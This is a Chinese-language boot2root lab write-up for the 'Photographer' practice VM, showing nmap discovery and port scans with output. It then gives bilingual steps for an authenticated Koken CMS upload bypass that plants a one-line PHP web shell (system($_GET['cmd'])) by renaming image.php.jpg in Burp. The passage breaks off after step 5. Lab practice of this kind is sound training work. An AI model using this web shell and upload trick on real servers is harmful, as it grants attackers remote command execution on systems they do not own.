提示:This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
测试环境
靶机 IP:未知 MAC:00:0C:29:A4:BA:BA kali IP:192.168.1.131 MAC:00:0C:29:E2:0D:83
root@kali:~/桌面# nmap -sP 192.168.1.1/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 11:02 CST Nmap scan report for 192.168.1.1 Host is up (0.00092s latency). MAC Address: 00:50:56:C0:00:01 (VMware) Nmap scan report for 192.168.1.133 Host is up (0.00021s latency). MAC Address: 00:0C:29:A4:BA:BA (VMware) Nmap scan report for 192.168.1.254 Host is up (0.00013s latency). MAC Address: 00:50:56:E9:4B:54 (VMware) Nmap scan report for 192.168.1.131 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 28.07 seconds
根据nmap返回信息确定靶机IP为192.168.1.133,对靶机进行进一步扫描,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
root@kali:~/桌面# nmap -T 4 -sV -p- 192.168.1.133 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 11:07 CST Nmap scan report for 192.168.1.133 Host is up (0.00099s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8000/tcp open ssl/http-alt? MAC Address: 00:0C:29:A4:BA:BA (VMware) Service Info: Host: PHOTOGRAPHER
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 75.52 seconds
1. Create a malicious PHP file with this content: 1.创建一个包含以下内容的恶意PHP文件:
<?php system($_GET['cmd']);?>
2. Save as "image.php.jpg" 2.另存为“ image.php.jpg”
3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp. 3. 通过身份验证后,转到Koken CMS仪表板,在“导入内容”按钮(“库”面板)上上传文件,然后将HTTP请求发送到Burp。
4. On Burp, rename your file to "image.php" 4.在Burp上,将文件重命名为“ image.php”
5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server. 5.在Koken CMS库上,选择您的文件,然后将鼠标放在“下载文件”上,以查看文件在服务器上的托管位置。